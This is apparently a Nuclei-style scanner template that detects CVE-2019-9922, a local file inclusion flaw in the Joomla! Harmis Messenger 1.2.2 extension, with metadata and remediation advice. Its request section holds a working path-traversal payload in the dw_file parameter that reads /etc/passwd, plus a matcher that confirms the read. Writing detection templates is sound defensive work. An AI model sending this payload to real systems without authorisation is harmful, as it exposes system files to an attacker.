id: CVE-2019-9922

info:
  name: Joomla! Harmis Messenger 1.2.2 - Local File Inclusion
  author: 0x_Akoko
  severity: high
  description: Joomla! Harmis Messenger 1.2.2 is vulnerable to local file inclusion which could give an attacker read access to arbitrary files.
  impact: |
    Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files, remote code execution, and potential compromise of the entire Joomla! application.
  remediation: |
    Update to the latest version of Harmis Messenger (1.2.3) or apply the patch provided by the vendor to fix the LFI vulnerability.
  reference:
    - https://github.com/azd-cert/CVE/blob/master/CVEs/CVE-2019-9922.md
    - https://extensions.joomla.org/extension/je-messenger/
    - https://nvd.nist.gov/vuln/detail/CVE-2019-9922
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2019-9922
    cwe-id: CWE-22
    epss-score: 0.01171
    epss-percentile: 0.83428
    cpe: cpe:2.3:a:harmistechnology:je_messenger:1.2.2:*:*:*:*:joomla\!:*:*
  metadata:
    max-request: 1
    vendor: harmistechnology
    product: je_messenger
    framework: joomla\!
  tags: cve2019,cve,joomla,messenger,lfi,harmistechnology,joomla\!

http:
  - method: GET
    path:
      - "{{BaseURL}}/index.php/component/jemessenger/box_details?task=download&dw_file=../../.././../../../etc/passwd"

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:[x*]:0:0"

      - type: status
        status:
          - 200
# digest: 4a0a004730450220276966fa3dd3a21b689a194a66c2e26334b919702ea71f91580f271b80522b5002210095e182dbaa3da414e60088587ce727a2609eb63fd7650e93d5897dfb768c4211:922c64590222798bb761d5b6d8e72950